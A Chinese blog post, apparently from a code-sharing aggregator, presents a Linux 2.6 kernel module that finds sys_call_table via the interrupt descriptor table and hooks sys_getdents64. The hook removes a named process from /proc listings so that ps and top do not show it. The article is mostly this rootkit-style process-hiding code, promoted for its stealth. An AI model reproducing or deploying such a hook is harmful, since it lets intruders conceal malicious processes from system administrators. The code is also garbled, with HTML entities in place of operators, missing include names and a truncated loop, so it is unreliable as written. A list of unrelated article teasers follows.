在Linux2.6内核中实现隐藏进程的技术方法与实践

作者：蓝色流星魂 | 来源：互联网 | 2024-10-30 12:57

本文探讨了在Linux2.6内核中实现进程隐藏的技术方法与实践。通过分析系统调用`sys_getdents`的工作原理，提出了一种有效的方法来隐藏指定的进程。该方法通过对内核模块进行修改，拦截并过滤掉目标进程的相关信息，从而在常用的进程查看命令（如`ps`和`top`）中无法显示这些隐藏的进程。实验结果表明，该方法在实际应用中具有较高的隐蔽性和稳定性。

很早以前的小程序&＃xff0c;比较简单但是觉得有趣

原理很简单&＃xff0c;Linux查看进程的命令ps是通过系统调用sys_getdents实现&＃xff0c;sys_getdents用户获取一个指定路径下的目录条目&＃xff0c;实际上就是枚举

/proc/　下的pid&＃xff0c;这样我们只需要hook一下sys_getdents&＃xff0c;把相应的要隐藏的pid信息去掉即可。

以下是LKM代码&＃xff0c;在Linux-2.6.14并运行成功

#include

#define CALLOFF 100

//使用模块参数来定义需要隐藏的进程名

char *processname;

module_param(processname, charp, 0);

struct {

unsigned short limit;

unsigned int base;

} __attribute__ ((packed)) idtr;

struct {

unsigned short off1;

unsigned short sel;

unsigned char none,

flags;

unsigned short off2;

} __attribute__ ((packed)) * idt;

void** sys_call_table;

asmlinkage long (*orig_getdents)(unsigned int fd, struct linux_dirent64 __user *dirp, unsigned int count);

char * findoffset(char *start)

{

char *p;

for (p &＃61; start; p

if (*(p &＃43; 0) &＃61;&＃61; &＃39;\xff&＃39; && *(p &＃43; 1) &＃61;&＃61; &＃39;\x14&＃39; && *(p &＃43; 2) &＃61;&＃61; &＃39;\x85&＃39;)

return p;

return NULL;

}

int myatoi(char *str)

{

int res &＃61; 0;

int mul &＃61; 1;

char *ptr;

for (ptr &＃61; str &＃43; strlen(str) - 1; ptr >&＃61; str; ptr--) {

if (*ptr <&＃39;0&＃39; || *ptr > &＃39;9&＃39;)

return (-1);

res &＃43;&＃61; (*ptr - &＃39;0&＃39;) * mul;

mul *&＃61; 10;

}

return (res);

}

struct task_struct *get_task(pid_t pid)

{

struct task_struct *p &＃61; get_current(),*entry&＃61;NULL;

list_for_each_entry(entry,&(p->tasks),tasks)

{

if(entry->pid &＃61;&＃61; pid)

{

printk("pid found\n");

return entry;

}

return NULL;

}

static inline char *get_name(struct task_struct *p, char *buf)

{

int i;

char *name;

name &＃61; p->comm;

i &＃61; sizeof(p->comm);

do {

unsigned char c &＃61; *name;

name&＃43;&＃43;;

i--;

*buf &＃61; c;

if (!c)

break;

if (c &＃61;&＃61; &＃39;\\&＃39;) {

buf[1] &＃61; c;

buf &＃43;&＃61; 2;

continue;

}

if (c &＃61;&＃61; &＃39;\n&＃39;) {

buf[0] &＃61; &＃39;\\&＃39;;

buf[1] &＃61; &＃39;n&＃39;;

buf &＃43;&＃61; 2;

continue;

}

buf&＃43;&＃43;;

}

while (i);

*buf &＃61; &＃39;\n&＃39;;

return buf &＃43; 1;

}　int get_process(pid_t pid)

{

struct task_struct *task &＃61; get_task(pid);

char *buffer[64] &＃61; {0};

if (task)

{

get_name(task, buffer);

if(strstr(buffer,processname))

return 1;

else

return 0;

}

else

return 0;

}

asmlinkage long hacked_getdents(unsigned int fd, struct linux_dirent64 __user *dirp, unsigned int count)

{

//added by lsc for process

long value;

struct inode *dinode;

int len &＃61; 0;

int tlen &＃61; 0;

struct linux_dirent64 *mydir &＃61; NULL;

//end

//在这里调用一下sys_getdents,得到返回的结果

value &＃61; (*orig_getdents) (fd, dirp, count);

tlen &＃61; value;

//遍历得到的目录列表

while(tlen > 0)

{

len &＃61; dirp->d_reclen;

tlen &＃61; tlen - len;

printk("%s\n",dirp->d_name);

//在proc文件系统中&＃xff0c;目录名就是pid,我们再根据pid找到进程名

if(get_process(myatoi(dirp->d_name)) )

{

printk("find process\n");

//发现匹配的进程&＃xff0c;调用memmove将这条进程覆盖掉

memmove(dirp, (char *) dirp &＃43; dirp->d_reclen, tlen);

value &＃61; value - len;

}

if(tlen)

dirp &＃61; (struct linux_dirent64 *) ((char *)dirp &＃43; dirp->d_reclen);

}

return value;

}

void **get_sct_addr(void)

{

unsigned sys_call_off;

unsigned sct &＃61; 0;

char *p;

asm("sidt %0":"&＃61;m"(idtr));

idt &＃61; (void *) (idtr.base &＃43; 8 * 0x80);

sys_call_off &＃61; (idt->off2 <<16) | idt->off1;

if ((p &＃61; findoffset((char *) sys_call_off)))

sct &＃61; *(unsigned *) (p &＃43; 3);

return ((void **)sct);

}

static void filter_exit(void)

{

if (sys_call_table)

sys_call_table[__NR_getdents64] &＃61; orig_getdents;

}

static int filter_init(void)

{

//得到sys_call_table的偏移地址

sys_call_table &＃61; get_sct_addr();

if (!sys_call_table) {

printk("get_act_addr(): NULL...\n");

return 0;

} else

printk("sct: 0x%x\n", (unsigned int)sys_call_table);

//将sys_call_table中注册的系统调用sys_getdents替换成我们自己的函数hack_getdents

orig_getdents &＃61; sys_call_table[__NR_getdents64];

sys_call_table[__NR_getdents64] &＃61; hacked_getdents;

return 0;

}

module_init(filter_init);

module_exit(filter_exit);

MODULE_LICENSE("GPL");

推荐阅读

ip
深入解析Spring启动过程

本文详细介绍了Spring框架的启动流程，帮助开发者理解其内部机制。通过具体示例和代码片段，解释了Bean定义、工厂类、读取器以及条件评估等关键概念，使读者能够更全面地掌握Spring的初始化过程。 ... [详细]

蜡笔小新 2024-12-21 17:33:44
object
使用预处理器开关确定类的版本

本文探讨了如何通过预处理器开关选择不同的类实现，并解决在特定情况下遇到的链接器错误。 ... [详细]

蜡笔小新 2024-12-22 12:03:31
format
Linux环境下C语言实现定时向文件写入当前时间

本文介绍如何在Linux系统中使用C语言编程，实现在每秒钟向指定文件中写入当前时间戳。通过此示例，读者可以了解基本的文件操作、时间处理以及循环控制。 ... [详细]

蜡笔小新 2024-12-21 21:39:27
js
优化C++项目中的JSON处理：选择高性能的RapidJSON库

在高并发需求的C++项目中，我们最初选择了JsonCpp进行JSON解析和序列化。然而，在处理大数据量时，JsonCpp频繁抛出异常，尤其是在多线程环境下问题更为突出。通过分析发现，旧版本的JsonCpp存在多线程安全性和性能瓶颈。经过评估，我们最终选择了RapidJSON作为替代方案，并实现了显著的性能提升。 ... [详细]

蜡笔小新 2024-12-21 18:13:59
js
JSOI2010 蔬菜庆典：树结构中的无限大权值问题

本文探讨了 JSOI2010 的蔬菜庆典问题，主要关注如何处理非根非叶子节点的无限大权值情况。通过分析根节点及其子树的特性，提出了有效的解决方案，并详细解释了算法的实现过程。 ... [详细]

蜡笔小新 2024-12-22 18:57:48
object
Qt QTableView 内嵌控件的实现方法

本文详细介绍了在 Qt QTableView 中嵌入控件的多种方法，包括使用 QItemDelegate、setIndexWidget 和 setIndexWidget 结合布局管理器。每种方法都有其适用场景和优缺点。 ... [详细]

蜡笔小新 2024-12-22 18:03:16
object
使用栈实现字符串中括号匹配的C++程序

本文介绍如何利用栈数据结构在C++中判断字符串中的括号是否匹配。通过顺序栈和链栈两种方式实现，并详细解释了算法的核心思想和具体实现步骤。 ... [详细]

蜡笔小新 2024-12-22 11:44:35
import
字符串中特定字符的移除方法

本文介绍如何从字符串中移除大写、小写、特殊、数字和非数字字符，并提供了多种编程语言的实现示例。 ... [详细]

蜡笔小新 2024-12-22 00:08:06
object
深入解析SpringMVC核心组件：DispatcherServlet的工作原理

本文详细探讨了SpringMVC的核心组件——DispatcherServlet的运作机制，旨在帮助有一定Java和Spring基础的开发人员理解HTTP请求是如何被映射到Controller并执行的。文章将解答以下问题：1. HTTP请求如何映射到Controller；2. Controller是如何被执行的。 ... [详细]

蜡笔小新 2024-12-21 18:50:52
format
深入解析CTF中的PWN挑战：Fastbin与堆溢出

本文将探讨2015年RCTF竞赛中的一道PWN题目——shaxian，重点分析其利用Fastbin和堆溢出的技巧。通过详细解析代码流程和漏洞利用过程，帮助读者理解此类题目的破解方法。 ... [详细]

蜡笔小新 2024-12-21 18:09:12
case
CSS高级技巧：动态高亮当前页面导航

本文介绍了如何使用CSS实现网站导航栏中当前页面的高亮显示，提升用户体验。通过为每个页面的body元素添加特定ID，并结合导航项的类名，可以轻松实现这一功能。 ... [详细]

蜡笔小新 2024-12-21 17:42:25
ip
解决C# Windows Forms客户端连接SignalR服务器时出现的错误

在尝试使用C# Windows Forms客户端通过SignalR连接到ASP.NET服务器时，遇到了内部服务器错误（500）。本文将详细探讨问题的原因及解决方案。 ... [详细]

蜡笔小新 2024-12-21 16:55:52
js
Python + Pytest 接口自动化测试中 Token 关联登录的实现方法

本文将深入探讨 Python 和 Pytest 在接口自动化测试中如何实现 Token 关联登录，内容详尽、逻辑清晰，旨在帮助读者掌握这一关键技能。 ... [详细]

蜡笔小新 2024-12-21 14:48:49
format
ElasticSearch 集群监控与优化

本文详细介绍了如何有效地监控 ElasticSearch 集群，涵盖了关键性能指标、集群健康状况、统计信息以及内存和垃圾回收的监控方法。 ... [详细]

蜡笔小新 2024-12-21 13:43:04
sum
由二叉树到贪心算法

二叉树很重要树是数据结构中的重中之重，尤其以各类二叉树为学习的难点。单就面试而言，在 ... [详细]

蜡笔小新 2024-12-21 13:13:13

蓝色流星魂

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章